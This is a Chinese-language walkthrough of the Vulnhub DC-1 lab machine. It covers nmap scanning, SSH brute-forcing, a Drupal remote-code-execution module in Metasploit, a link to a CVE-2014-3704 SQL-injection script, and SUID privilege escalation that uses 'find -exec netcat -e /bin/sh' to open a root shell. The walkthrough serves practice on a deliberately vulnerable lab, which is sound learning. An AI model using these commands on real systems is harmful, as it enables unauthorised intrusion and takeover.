Vulnhub练习 DC-1靶机

Vulnhub练习 DC-1靶机
下载链接 https://www.vulnhub.com/entry/dc-1,292/
建议使用迅雷进行下载，相较于浏览器下载，会快一些
使用nat模式，搭建虚拟局域网，建议采用VMnet1
首先进行主机发现
nmap -sS 192.168.43.0/24 使用ping检测43整个C端内主机存活情况

端口检测，这边提供两个方法，nmap和goby
Nmap -A 192.168.43.238 -T4 以较快的速度进行端口及服务探测
Goby的话将ip丢进去等结果

首先判断端口的开放情况，22 ssh远程登录接口 80端口显示Apache 说明该端口存在web服务，111端口显示的服务为rpcbind,百度了下只有个ddos攻击的漏洞，没啥用，对22端口，使用超级弱口令检测工具进行爆破

没有检测到结果
只能够从80端口开启的Apache服务下手
查看80端口开放的服务
发现该网址为Drupal Site,使用wapplyzer发现为drupal7,是个cms内容管理框架，在https://www.exploit-db.com/查找相应漏洞，xss什么的没必要看，优先选择那些远程命令执行和sql注入的
这里瞎用 2018-04-17的那个，后面显示metasploit说明已集成到msf中，在kali中打开msf，并且查找druple利用模块，

这里选择第二个，因为和exploit-db中的描述是一致的
设置完成自己的目标IP即可成功获得shell，发现自己为普通用户权限，下一步需要提权

本来想要采用sudo和脏牛提权，sudo显示命令未找到，脏牛的话，make编译的时候缺少gcc

采用suid提权，查找使用root权限的文件
find / -perm -4000 -type f 2>/dev/null
查找SUID文件
find / -uid 0 -perm -4000 -type f 2>/dev/null
发现存在find，使用find进行提权
touch test
Nc反弹shell

find test -exec netcat -lvp 5555 -e /bin/sh ;
重新开启一个命令行，连接目标主机即可获取root权限

本来做到这里就应该结束的，但是看到别人的wp还需要登录后台，
再次掏出来 百度大法 在exploit-db中没有显示出其他的漏洞，换个平台
https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=drupal7 在这里面会发现druple存在一个sql注入漏洞，
cve编号为，点进去会有详细介绍，并且有exp的位置，但还是显示在exploit-db中，explioit中又到github中，可谓无限套娃，但由于个人水平不足，php写的exp不会用，在github中搜索刚刚找到的cve编号，即可找到对应的py脚本，可以直接添加用户
https://github.com/happynote3966/CVE-2014-3704
使用方法

注意，使用该脚本时候需要采用python2，否则会和我一样报错

至于另外一种连接数据库，更改密码的方式，这里贴一下地址
https://blog.csdn.net/qq_45427131/article/details/118711572

查看当前页面，使用findsomething插件发现当前页面存在某些路径

复制访问一下

总共三个功能，注册账户，登录，以及邮箱找回密码
在注册界面，注册自己的账号

输入用户名admin,[email protected]时，显示名称admin已被占用，这不就用户名枚举吗？
话不多说，在登录界面抓包爆破，弱口令top1000

跑几个就禁止ip了，这个方法也行不通
输入admin’ 发现页面返回内容变成无法识别，话不多说，丢到sqlmap里面跑一跑